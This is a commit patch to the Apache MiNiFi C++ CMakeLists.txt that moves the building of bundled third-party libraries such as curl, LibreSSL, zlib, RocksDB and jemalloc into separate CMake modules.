MINIFICPP-1022 - Refactored third party build system

Signed-off-by: Daniel Bakai <bakaid@apache.org>

Approved by aboda on GH

This closes #661
diff --git a/CMakeLists.txt b/CMakeLists.txt
index 338b6ee..02098e2 100644
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -31,6 +31,10 @@
 include(FeatureSummary)
 include(ExternalProject)
 
+# Provide custom modules for the project
+list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake")
+include(WholeArchive)
+
 option(SKIP_TESTS "Skips building all tests." OFF)
 option(PORTABLE "Instructs the compiler to remove architecture specific optimizations" ON)
 option(USE_SHARED_LIBS "Builds using shared libraries" ON)
@@ -46,8 +50,6 @@
 
 cmake_dependent_option(USE_SYSTEM_ZLIB "Instructs the build system to search for and use a zlib library available in the host system" ON "NOT STATIC_BUILD" OFF)
 
-cmake_dependent_option(USE_SYSTEM_LIBSSH2 "Instructs the build system to search for and use a libssh2 library available in the host system" OFF "NOT STATIC_BUILD" OFF)
-
 option(USE_SYSTEM_BZIP2 "Instructs the build system to search for and use a bzip2 library available in the host system" ON)
 option(BUILD_ROCKSDB "Instructs the build system to use RocksDB from the third party directory" ON)
 option(FORCE_WINDOWS "Instructs the build system to force Windows builds when WIN32 is specified" OFF)
@@ -55,69 +57,6 @@
 
 option(USE_GOLD_LINKER "Use Gold Linker" OFF)
 
-if (OPENSSL_ROOT_DIR )
-	set(OPENSSL_PASSTHROUGH "-DOPENSSL_ROOT_DIR=${OPENSSL_ROOT_DIR}")
-endif()
-
-set(PASSTHROUGH_CMAKE_ARGS -DANDROID_ABI=${ANDROID_ABI}
-                           -DANDROID_PLATFORM=${ANDROID_PLATFORM}
-                           -DANDROID_STL=${ANDROID_STL}
-                           -DCMAKE_LIBRARY_OUTPUT_DIRECTORY=${CMAKE_LIBRARY_OUTPUT_DIRECTORY}
-                           -DCMAKE_BUILD_TYPE=${CMAKE_BUILD_TYPE}
-                           -DANDROID_NDK=${ANDROID_NDK}
-                           -DCMAKE_CXX_FLAGS=${CMAKE_CXX_FLAGS}
-                           -DCMAKE_TOOLCHAIN_FILE=${CMAKE_TOOLCHAIN_FILE}
-                           -DCMAKE_MAKE_PROGRAM=${CMAKE_MAKE_PROGRAM}
-                           -DCMAKE_C_COMPILER=${CMAKE_C_COMPILER}
-                           -DCMAKE_CXX_COMPILER=${CMAKE_CXX_COMPILER}
-                           -DCMAKE_FIND_ROOT_PATH=${CMAKE_FIND_ROOT_PATH}
-                           -DCMAKE_FIND_ROOT_PATH_MODE_PROGRAM=${CMAKE_FIND_ROOT_PATH_MODE_PROGRAM}
-                           -DCMAKE_FIND_ROOT_PATH_MODE_LIBRARY=${CMAKE_FIND_ROOT_PATH_MODE_LIBRARY}
-                           -DCMAKE_FIND_ROOT_PATH_MODE_INCLUDE=${CMAKE_FIND_ROOT_PATH_MODE_INCLUDE}
-                           -DCMAKE_INSTALL_PREFIX=${CMAKE_INSTALL_PREFIX}
-						   ${OPENSSL_PASSTHROUGH}
-                           -G${CMAKE_GENERATOR})
-
-if(NOT WIN32)
-	if (ENABLE_JNI)
-	if (NOT DISABLE_JEMALLOC)
-	  set(BASE_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/jemalloc")
-	  
-	  set(DIR "${BASE_DIR}/extensions/jemalloc-src")
-	  set(JE_BYPRODUCT "${DIR}/lib/libjemalloc.a")
-	  ExternalProject_Add(
-	    jemalloc-external
-	    GIT_REPOSITORY "https://github.com/jemalloc/jemalloc.git"
-	    GIT_TAG "61efbda7098de6fe64c362d309824864308c36d4" 
-	    PREFIX "${BASE_DIR}/extensions/jemalloc"
-	    BUILD_IN_SOURCE true
-	    SOURCE_DIR "${DIR}"
-	    BUILD_COMMAND make
-	    CMAKE_COMMAND ""
-	    UPDATE_COMMAND ""
-	    BUILD_BYPRODUCTS ${JE_BYPRODUCT} 
-	    INSTALL_COMMAND ${CMAKE_COMMAND}  -E echo "Skipping install step."
-	    CONFIGURE_COMMAND ""
-	    PATCH_COMMAND ./autogen.sh && ./configure 
-	    STEP_TARGETS build
-	    EXCLUDE_FROM_ALL TRUE
-	  )
-	  
-	  add_library(jemalloc STATIC IMPORTED)
-	  set_target_properties(jemalloc PROPERTIES IMPORTED_LOCATION "${JE_BYPRODUCT}")
-	  add_dependencies(jemalloc jemalloc-external)
-	  set(JEMALLOC_FOUND "YES" CACHE STRING "" FORCE)
-	  set(JEMALLOC_INCLUDE_DIRS "${DIR}/include" CACHE STRING "" FORCE)
-	  set(JEMALLOC_LIBRARIES jemalloc CACHE STRING "" FORCE)
-	  set(JEMALLOC_LIBRARY jemalloc CACHE STRING "" FORCE)
-	  set(JEMALLOC_LIBRARY jemalloc CACHE STRING "" FORCE)
-
-	endif()
-	set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -DENABLE_JNI")
-	set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -DENABLE_JNI")
-
-	endif()
-endif()
 
 # Use ccache if present
 find_program(CCACHE_FOUND ccache)
@@ -127,6 +66,7 @@
     message("-- Found ccache: ${CCACHE_FOUND}")
 endif(CCACHE_FOUND)
 
+# Use gold linker if instructed
 if (UNIX AND USE_GOLD_LINKER AND NOT APPLE )
   execute_process(COMMAND ${CMAKE_C_COMPILER} -fuse-ld=gold -Wl,--version ERROR_QUIET OUTPUT_VARIABLE ld_version)
   if ("${ld_version}" MATCHES "GNU gold")
@@ -135,7 +75,7 @@
   endif()
 endif()
 
-# check for exec info before we enable the backtrace features.
+# Check for exec info before we enable the backtrace features.
 CHECK_INCLUDE_FILE("execinfo.h" HAS_EXECINFO)
 if (ENABLE_OPS AND HAS_EXECINFO AND NOT WIN32)
   add_definitions("-DHAS_EXECINFO=1")
@@ -174,233 +114,141 @@
 #set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wall")
 
 if (NOT PORTABLE)
-  if(MSVC)
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /arch:AVX2")
-  else()
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -march=native")
-  endif()
+	if(MSVC)
+		set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} /arch:AVX2")
+		set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /arch:AVX2")
+	else()
+		set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -march=native")
+		set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -march=native")
+	endif()
 endif()
 
 set(CMAKE_CXX_STANDARD 11)
 set(CMAKE_CXX_STANDARD_REQUIRED ON)
 
-# Search for threads
+#### Third party dependencies ####
+
+# Define function for passing dependencies
+function(append_third_party_passthrough_args OUTPUT EXTERNALPROJECT_CMAKE_ARGS)
+	string(REPLACE ";" "%" CMAKE_MODULE_PATH_PASSTHROUGH "${CMAKE_MODULE_PATH}")
+	list(APPEND EXTERNALPROJECT_CMAKE_ARGS "-DCMAKE_MODULE_PATH=${CMAKE_MODULE_PATH_PASSTHROUGH}")
+	list(APPEND EXTERNALPROJECT_CMAKE_ARGS ${PASSTHROUGH_VARIABLES})
+	set(${OUTPUT} ${EXTERNALPROJECT_CMAKE_ARGS} PARENT_SCOPE)
+endfunction()
+
+# Find patch executable
+find_package(Patch REQUIRED)
+
+# Setup passthrough args
+set(PASSTHROUGH_CMAKE_ARGS -DANDROID_ABI=${ANDROID_ABI}
+		-DANDROID_PLATFORM=${ANDROID_PLATFORM}
+		-DANDROID_STL=${ANDROID_STL}
+		-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=${CMAKE_LIBRARY_OUTPUT_DIRECTORY}
+		-DCMAKE_BUILD_TYPE=${CMAKE_BUILD_TYPE}
+		-DANDROID_NDK=${ANDROID_NDK}
+		-DCMAKE_C_FLAGS=${CMAKE_C_FLAGS}
+		-DCMAKE_CXX_FLAGS=${CMAKE_CXX_FLAGS}
+		-DCMAKE_TOOLCHAIN_FILE=${CMAKE_TOOLCHAIN_FILE}
+		-DCMAKE_MAKE_PROGRAM=${CMAKE_MAKE_PROGRAM}
+		-DCMAKE_C_COMPILER=${CMAKE_C_COMPILER}
+		-DCMAKE_CXX_COMPILER=${CMAKE_CXX_COMPILER}
+		-DCMAKE_FIND_ROOT_PATH=${CMAKE_FIND_ROOT_PATH}
+		-DCMAKE_FIND_ROOT_PATH_MODE_PROGRAM=${CMAKE_FIND_ROOT_PATH_MODE_PROGRAM}
+		-DCMAKE_FIND_ROOT_PATH_MODE_LIBRARY=${CMAKE_FIND_ROOT_PATH_MODE_LIBRARY}
+		-DCMAKE_FIND_ROOT_PATH_MODE_INCLUDE=${CMAKE_FIND_ROOT_PATH_MODE_INCLUDE}
+		-DCMAKE_INSTALL_PREFIX=${CMAKE_INSTALL_PREFIX}
+		-G${CMAKE_GENERATOR}
+		)
+
+# jemalloc
+if(NOT WIN32)
+	if (ENABLE_JNI)
+		if (NOT DISABLE_JEMALLOC)
+			include(BundledJemalloc)
+			use_bundled_jemalloc(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+			message("jemalloc found at ${JEMALLOC_LIBRARIES}")
+		endif()
+		set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -DENABLE_JNI")
+		set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -DENABLE_JNI")
+
+	endif()
+endif()
+
+# thread library
 find_package(Threads REQUIRED)
 
+# Simple-Windows-Posix-Semaphore
 if (WIN32)
   	add_subdirectory("thirdparty/Simple-Windows-Posix-Semaphore")
 endif()
 
-# Provide custom modules for the project
-list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake")
-
-if (NOT OPENSSL_OFF)
-	include(LibreSSL)
-	use_libre_ssl("${CMAKE_CURRENT_SOURCE_DIR}" "${CMAKE_CURRENT_BINARY_DIR}")
-	list(APPEND CMAKE_MODULE_PATH "${CMAKE_CURRENT_SOURCE_DIR}/cmake/ssl")
-
-	find_package (OpenSSL REQUIRED)
-
-	if (OPENSSL_FOUND)
-	  include_directories(${OPENSSL_INCLUDE_DIR})
-	  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -DOPENSSL_SUPPORT")
-	  set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -DOPENSSL_SUPPORT")
-	  MESSAGE("OpenSSL found at ${OPENSSL_LIBRARIES}")
-	else ()
-	  message( FATAL_ERROR "OpenSSL was not found." )
-	endif (OPENSSL_FOUND)
-else()
-	list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/winssl")
-endif()
-
-if (OPENSSL_ROOT_DIR )
-    set(OPENSSL_PASSTHROUGH "-DOPENSSL_ROOT_DIR=${OPENSSL_ROOT_DIR}")
-endif()
-
-set(PASSTHROUGH_CMAKE_ARGS -DANDROID_ABI=${ANDROID_ABI}
-        -DANDROID_PLATFORM=${ANDROID_PLATFORM}
-        -DANDROID_STL=${ANDROID_STL}
-        -DCMAKE_LIBRARY_OUTPUT_DIRECTORY=${CMAKE_LIBRARY_OUTPUT_DIRECTORY}
-        -DCMAKE_BUILD_TYPE=${CMAKE_BUILD_TYPE}
-        -DANDROID_NDK=${ANDROID_NDK}
-        -DCMAKE_CXX_FLAGS=${CMAKE_CXX_FLAGS}
-        -DCMAKE_TOOLCHAIN_FILE=${CMAKE_TOOLCHAIN_FILE}
-        -DCMAKE_MAKE_PROGRAM=${CMAKE_MAKE_PROGRAM}
-        -DCMAKE_C_COMPILER=${CMAKE_C_COMPILER}
-        -DCMAKE_CXX_COMPILER=${CMAKE_CXX_COMPILER}
-        -DCMAKE_FIND_ROOT_PATH=${CMAKE_FIND_ROOT_PATH}
-        -DCMAKE_FIND_ROOT_PATH_MODE_PROGRAM=${CMAKE_FIND_ROOT_PATH_MODE_PROGRAM}
-        -DCMAKE_FIND_ROOT_PATH_MODE_LIBRARY=${CMAKE_FIND_ROOT_PATH_MODE_LIBRARY}
-        -DCMAKE_FIND_ROOT_PATH_MODE_INCLUDE=${CMAKE_FIND_ROOT_PATH_MODE_INCLUDE}
-        -DCMAKE_INSTALL_PREFIX=${CMAKE_INSTALL_PREFIX}
-        ${OPENSSL_PASSTHROUGH}
-        -G${CMAKE_GENERATOR})
-
-include(Compression)
-
-if(WIN32 OR NOT USE_SYSTEM_ZLIB)
-	use_bundled_zlib(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
-	find_package (OpenSSL REQUIRED)
-	list(APPEND CMAKE_MODULE_PATH "${SOURCE_DIR}/cmake/zlib/dummy")
-endif()
-
-find_package (ZLIB REQUIRED)
-
-if (ZLIB_FOUND)
-  include_directories(${ZLIB_INCLUDE_DIRS})
-endif()
-
-SET(TEST_DIR ${CMAKE_SOURCE_DIR}/libminifi/test)
-
-include(Extensions)
-
+# ossp-uuid
 if(NOT WIN32)
 	include(BundledOSSPUUID)
 	use_bundled_osspuuid(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
 endif()
 
-include_directories(thirdparty/ut)
+# OpenSSL/LibreSSL
+if (NOT OPENSSL_OFF)
+	include(BundledLibreSSL)
+	use_libre_ssl("${CMAKE_CURRENT_SOURCE_DIR}" "${CMAKE_CURRENT_BINARY_DIR}")
+	list(APPEND CMAKE_MODULE_PATH "${CMAKE_CURRENT_SOURCE_DIR}/cmake/ssl")
 
-if (DISABLE_CURL)
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -DDISABLE_CURL")
-	set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -DDISABLE_CURL")
-endif(DISABLE_CURL)
+	set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -DOPENSSL_SUPPORT")
+	set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -DOPENSSL_SUPPORT")
+endif()
+
+# zlib
+if(WIN32 OR NOT USE_SYSTEM_ZLIB)
+	include(BundledZLIB)
+	use_bundled_zlib(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+	list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/zlib/dummy")
+else()
+	find_package(ZLIB REQUIRED)
+endif()
+
+# uthash
+add_library(ut INTERFACE)
+target_include_directories(ut INTERFACE "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/ut")
+
+# cURL
 if(NOT DISABLE_CURL)
-  message("Using bundled cURL")
-
-  set(CURL_C_FLAGS "${CMAKE_C_FLAGS}")
-  set(CURL_CXX_FLAGS "${CMAKE_CXX_FLAGS}")
-
-
-get_property(LIB64 GLOBAL PROPERTY FIND_LIBRARY_USE_LIB64_PATHS)
-
-if ("${LIB64}" STREQUAL "TRUE" AND (NOT WIN32 AND NOT APPLE))
-    set(LIBSUFFIX 64)
+	include(BundledLibcURL)
+	use_bundled_curl(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+	list(APPEND CMAKE_MODULE_PATH "${CMAKE_CURRENT_SOURCE_DIR}/cmake/curl/dummy")
 else()
-    set(LIBSUFFIX "")
+	set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -DDISABLE_CURL")
+	set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -DDISABLE_CURL")
 endif()
 
-  if (WIN32)
-	set(BYPRODUCT "lib/libcurl.lib")
-  else()
-  	set(BYPRODUCT "lib${LIBSUFFIX}/libcurl.a")
-  endif()
+# spdlog
+add_library(spdlog INTERFACE)
+target_include_directories(spdlog INTERFACE "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/spdlog-20170710/include")
 
-  if (WIN32)
-  set (PC "PATCH_COMMAND ./buildconf.bat")
-  else()
-  endif()
+# yaml-cpp
+include(BundledYamlCpp)
+use_bundled_yamlcpp(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
 
-  list(APPEND CURL_CMAKE_MODULE_PATH_PASSTHROUGH_LIST "${CMAKE_SOURCE_DIR}/cmake/ssl")
-  if(WIN32 OR NOT USE_SYSTEM_ZLIB)
-	  list(APPEND CURL_CMAKE_MODULE_PATH_PASSTHROUGH_LIST "${CMAKE_SOURCE_DIR}/cmake/zlib/dummy")
-  endif()
-  string(REPLACE ";" "%" CURL_CMAKE_MODULE_PATH_PASSTHROUGH "${CURL_CMAKE_MODULE_PATH_PASSTHROUGH_LIST}")
+# concurrentqueue
+add_library(concurrentqueue INTERFACE)
+target_include_directories(concurrentqueue INTERFACE "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/concurrentqueue")
 
-  ExternalProject_Add(
-    curl-external
-    GIT_REPOSITORY "https://github.com/curl/curl.git"
-    GIT_TAG "f3294d9d86e6a7915a967efff2842089b8b0d071"  # Version 7.64.0
-    SOURCE_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/curl-src"
-    LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
-    CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
-               "-DCMAKE_INSTALL_PREFIX=${CMAKE_CURRENT_BINARY_DIR}/thirdparty/curl-install"
-                -DCMAKE_POSITION_INDEPENDENT_CODE=ON
-                -DBUILD_CURL_EXE=OFF
-                -DBUILD_TESTING=OFF
-                -DCMAKE_USE_OPENSSL=ON
-                -DBUILD_SHARED_LIBS=OFF
-                -DHTTP_ONLY=ON
-                -DCMAKE_USE_OPENSSL=ON
-                "-DLIBRESSL_BIN_DIR=${LIBRESSL_BIN_DIR}"
-                "-DLIBRESSL_SRC_DIR=${LIBRESSL_SRC_DIR}"
-                "-DBYPRODUCT_PREFIX=${BYPRODUCT_PREFIX}"
-                "-DBYPRODUCT_SUFFIX=${BYPRODUCT_SUFFIX}"
-                "-DZLIB_BYPRODUCT_INCLUDE=${ZLIB_BYPRODUCT_INCLUDE}"
-                "-DZLIB_BYPRODUCT=${ZLIB_BYPRODUCT}"
-                "-DZLIB_LIBRARY=${ZLIB_LIBRARY}"
-                "-DZLIB_LIBRARIES=${ZLIB_LIBRARIES}"
-                -DCURL_DISABLE_CRYPTO_AUTH=ON
-                -DCMAKE_USE_LIBSSH2=OFF
-                "-DCMAKE_DEBUG_POSTFIX="
-                -DHAVE_GLIBC_STRERROR_R=1
-                -DHAVE_GLIBC_STRERROR_R__TRYRUN_OUTPUT=""
-                -DHAVE_POSIX_STRERROR_R=0
-                -DHAVE_POSIX_STRERROR_R__TRYRUN_OUTPUT=""
-                -DHAVE_POLL_FINE_EXITCODE=0
-                -DHAVE_FSETXATTR_5=0
-                -DHAVE_FSETXATTR_5__TRYRUN_OUTPUT=""
-               "-DCMAKE_MODULE_PATH=${CURL_CMAKE_MODULE_PATH_PASSTHROUGH}"
-               "-DCMAKE_C_FLAGS=${CURL_C_FLAGS}"
-               "-DCMAKE_BUILD_TYPE=${CMAKE_BUILD_TYPE}"
-               "-DCMAKE_CXX_FLAGS=${CURL_CXX_FLAGS}"
-	${PC}
-    BUILD_BYPRODUCTS "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/curl-install/${BYPRODUCT}"
-  )
+# RapidJSON
+add_library(RapidJSON INTERFACE)
+target_include_directories(RapidJSON INTERFACE "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/rapidjson-1.1.0/include")
 
-  add_dependencies(curl-external libressl-portable)
-  if(WIN32 OR NOT USE_SYSTEM_ZLIB)
-	  add_dependencies(curl-external zlib-external)
-  endif()
+# Cron
+add_library(cron INTERFACE)
+target_include_directories(cron INTERFACE "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/cron")
 
-  set(CURL_SRC_DIR "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/curl/" CACHE STRING "" FORCE)
-  set(CURL_BIN_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/curl-install/" CACHE STRING "" FORCE)
-  set(CURL_BYPRODUCT_DIR "${BYPRODUCT}" CACHE STRING "" FORCE)
-  list(APPEND CMAKE_MODULE_PATH "${CMAKE_CURRENT_SOURCE_DIR}/cmake/curl/dummy")
-  add_library(curl STATIC IMPORTED)
-  set_target_properties(curl PROPERTIES IMPORTED_LOCATION "${CURL_BIN_DIR}${BYPRODUCT}")
-    
-  if (OPENSSL_FOUND) 
-     if (NOT WIN32)
-       set_target_properties(curl PROPERTIES INTERFACE_LINK_LIBRARIES ${OPENSSL_LIBRARIES})
-	 endif()
-  endif(OPENSSL_FOUND)
-  add_dependencies(curl curl-external)
-  set(CURL_FOUND "YES")
-  set(CURL_INCLUDE_DIRS "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/curl/include")
-  set(CURL_LIBRARY "${CURL_BIN_DIR}${BYPRODUCT}" CACHE STRING "" FORCE)
-  set(CURL_LIBRARIES "${CURL_LIBRARY}" CACHE STRING "" FORCE)
- else()
-  message("Using System cURL")
-endif()
+# cxxopts
+add_library(cxxopts INTERFACE)
+target_include_directories(cxxopts INTERFACE "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/cxxopts/include")
 
-if (CURL_FOUND)
-  include_directories("${CURL_INCLUDE_DIRS}")
-endif()
+#### Extensions ####
+SET(TEST_DIR ${CMAKE_SOURCE_DIR}/libminifi/test)
+include(Extensions)
 
-file(GLOB SPD_SOURCES "thirdparty/spdlog-20170710/include/spdlog/*")
-
-include(ExternalProject)
-
-set(CIVETWEB_ENABLE_SSL_DYNAMIC_LOADING OFF CACHE BOOL "Disable dynamic SSL library loading")
-set(CIVETWEB_ENABLE_CXX ON CACHE BOOL "Enable civet C++ library")
-set(CIVETWEB_SSL_SSL_LIB "${OPENSSL_SSL_LIBRARY}" CACHE STRING "Enable civet C++ library")
-set(CIVETWEB_SSL_CRYPTO_LIB "${OPENSSL_CRYPTO_LIBRARY}" CACHE STRING "Enable civet C++ library")
-set(CIVETWEB_ENABLE_CXX ON CACHE BOOL "Enable civet C++ library")
-if (NOT OPENSSL_FOUND)
-	message("SSL support disabled, ListenHTTP will not have HTTPS support")
-	set(CIVETWEB_ENABLE_SSL OFF CACHE BOOL "DISABLE SSL")
-endif()
-
-SET(WITH_TOOLS OFF CACHE BOOL "Do not build RocksDB tools")
-if ( NOT APPLE)
-if (ENABLE_PYTHON)
-  SET(BUILD_SHARED_LIBS ON CACHE BOOL "Build yaml cpp shared lib" FORCE)
-else()
-  SET(BUILD_SHARED_LIBS OFF CACHE BOOL "Build yaml cpp shared lib" FORCE)
-endif()
-endif()
-SET(WITH_TESTS OFF CACHE BOOL "Build RocksDB library (not repo) tests")
-set(CIVET_THIRDPARTY_ROOT "${CMAKE_SOURCE_DIR}/thirdparty/civetweb-1.10/" CACHE STRING "Path to CivetWeb root")
-set(CIVET_BINARY_ROOT "${CMAKE_BINARY_DIR}/thirdparty/civetweb-1.10/" CACHE STRING "Path to CivetWeb binary output")
-set(ROCKSDB_THIRDPARTY_ROOT "${CMAKE_SOURCE_DIR}/thirdparty/rocksdb/" CACHE STRING "Path to RocksDB root")
-add_subdirectory(thirdparty/yaml-cpp-yaml-cpp-20171024)
-
-include_directories(thirdparty/concurrentqueue)
-include_directories(thirdparty/yaml-cpp-yaml-cpp-20171024/include)
-include_directories(thirdparty/rapidjson-1.1.0/include)
-
-## Expression language extensions
 if(BOOTSTRAP)
 	# display an error message for those using the bootstrap
     message(FATAL_ERROR "Bootstrapping is no longer needed within the agent")
@@ -408,48 +256,40 @@
 
 add_subdirectory(libminifi)
 
-add_dependencies(minifi libressl-portable)
-add_dependencies(minifi curl-external)
-
-if (WIN32 OR NOT USE_SYSTEM_ZLIB)
-	add_dependencies(minifi zlib-external)
-endif(WIN32 OR NOT USE_SYSTEM_ZLIB)
-
 createExtension(STANDARD-PROCESSORS "STANDARD PROCESSORS" "Provides standard processors" "extensions/standard-processors" "extensions/standard-processors/tests/")
 
-
-#### EXTENSIONS
 if ((DISABLE_CURL STREQUAL "OFF" OR NOT DISABLE_CURL) AND NOT DISABLE_CIVET)
 	createExtension(HTTP-CURL "HTTP CURL" "This enables RESTProtocol, InvokeHTTP, and the HTTPClient for Site to Site" "extensions/http-curl" "extensions/http-curl/tests/")
 	message("minifi-http-curl will depend on curl-external")
-	add_dependencies(minifi-http-curl curl-external)
 endif()
 
 option(DISABLE_EXPRESSION_LANGUAGE "Disables the scripting extensions." OFF)
 if (NOT DISABLE_EXPRESSION_LANGUAGE)
     createExtension(EXPRESSION-LANGUAGE-EXTENSIONS "EXPRESSION LANGUAGE EXTENSIONS" "This enables NiFi expression language" "extensions/expression-language" "extensions/expression-language/tests")
-	add_dependencies(minifi-expression-language-extensions libressl-portable)
 
 	message("minifi-expression-language-extensions will depend on curl-external")
-	add_dependencies(minifi-expression-language-extensions curl-external)
 endif()
 
-
-
 option(DISABLE_CIVET "Disables CivetWeb components." OFF)
 if (NOT DISABLE_CIVET)
+	include(BundledCivetWeb)
+	use_bundled_civetweb(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+	list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/civetweb/dummy")
+
 	createExtension(CIVETWEB CIVETWEB "This enables ListenHTTP" "extensions/civetweb" "extensions/civetweb/tests")
-	add_dependencies(minifi-civet-extensions libressl-portable)
 endif()
 
 ## Add the rocks DB extension
-if (NOT ROCKSDB_FOUND OR BUILD_ROCKSDB)
-	set(BUILD_RD "TRUE")
-endif()
-
 option(DISABLE_ROCKSDB "Disables the RocksDB extension." OFF)
-if (DISABLE_ROCKSDB STREQUAL "OFF" OR NOT DISABLE_ROCKSDB)
-	createExtension(ROCKSDB-REPOS "ROCKSDB REPOS" "This Enables persistent provenance, flowfile, and content repositories using RocksDB" "extensions/rocksdb-repos" "${TEST_DIR}/rocksdb-tests" BUILD_RD "${ROCKSDB_THIRDPARTY_ROOT}")
+if (NOT DISABLE_ROCKSDB)
+	if (BUILD_ROCKSDB)
+		include(BundledRocksDB)
+		use_bundled_rocksdb(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+	else()
+		list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/rocksdb/sys")
+		find_package(RocksDB REQUIRED)
+	endif()
+	createExtension(ROCKSDB-REPOS "ROCKSDB REPOS" "This Enables persistent provenance, flowfile, and content repositories using RocksDB" "extensions/rocksdb-repos" "${TEST_DIR}/rocksdb-tests")
 endif()
 
 ## Create LibArchive Extension
@@ -468,6 +308,8 @@
 
 option(ENABLE_COAP "Enables the CoAP extension." OFF)
 if (ENABLE_ALL OR ENABLE_COAP STREQUAL "ON")
+	include(BundledLibCOAP)
+	use_bundled_libcoap(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
 	createExtension(COAP-EXTENSION "COAP EXTENSIONS" "Enables LibCOAP Functionality." "extensions/coap" "extensions/coap/tests/")
 	if( NOT DISABLE_CURL)
 		add_dependencies(minifi-coap minifi-http-curl)
@@ -475,27 +317,28 @@
 endif()
 
 if (WIN32)
-option(ENABLE_WEL "Enables the suite of Windows Event Log extensions." OFF)
-if (ENABLE_ALL OR ENABLE_WEL)
-	createExtension(WEL-EXTENSION "WEL EXTENSIONS" "Enables the suite of Windows Event Log extensions." "extensions/windows-event-log" "extensions/windows-event-log/tests")
-endif()
+	option(ENABLE_WEL "Enables the suite of Windows Event Log extensions." OFF)
+	if (ENABLE_ALL OR ENABLE_WEL)
+		include(BundledPugiXml)
+		use_bundled_pugixml(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+		createExtension(WEL-EXTENSION "WEL EXTENSIONS" "Enables the suite of Windows Event Log extensions." "extensions/windows-event-log" "extensions/windows-event-log/tests")
+	endif()
 endif(WIN32)
 
 ## Create MQTT Extension
 option(ENABLE_MQTT "Enables the mqtt extension." OFF)
 if(ENABLE_ALL OR ENABLE_MQTT)
-        createExtension(MQTT-EXTENSIONS "MQTT EXTENSIONS" "This Enables MQTT functionality including PublishMQTT/ConsumeMQTT" "extensions/mqtt" "${TEST_DIR}/mqtt-tests" "TRUE" "thirdparty/paho.mqtt.c")
-        add_dependencies(paho-mqtt3cs libressl-portable)
-        add_dependencies(paho-mqtt3as libressl-portable)
-        add_dependencies(paho-mqtt3cs-static libressl-portable)
-        add_dependencies(paho-mqtt3as-static libressl-portable)
+		include(BundledPahoMqttC)
+		use_bundled_pahomqttc(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+        createExtension(MQTT-EXTENSIONS "MQTT EXTENSIONS" "This Enables MQTT functionality including PublishMQTT/ConsumeMQTT" "extensions/mqtt" "${TEST_DIR}/mqtt-tests")
 endif()
 
+# Create JNI Extension
 if(ENABLE_ALL OR ENABLE_JNI)
 	createExtension(JNI-EXTENSION "JNI EXTENSIONS" "Enables JNI capabilities to support loading Java Classes." "extensions/jni" "${TEST_DIR}/jni-tests")
 endif()
 
-
+# Create PCAP Extension
 option(ENABLE_PCAP "Enables the PCAP extension." OFF)
 if(ENABLE_ALL OR ENABLE_PCAP)
 	createExtension(PCAP-EXTENSION "PCAP EXTENSIONS" "Enables libPCAP Functionality and the PacketCapture processor." "extensions/pcap" "${TEST_DIR}/pcap-tests")
@@ -504,15 +347,21 @@
 ## Create LibRdKafka Extension
 option(ENABLE_LIBRDKAFKA "Enables the librdkafka extension." OFF)
 if (ENABLE_ALL OR ENABLE_LIBRDKAFKA)
+	include(BundledLibRdKafka)
+	use_bundled_librdkafka(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
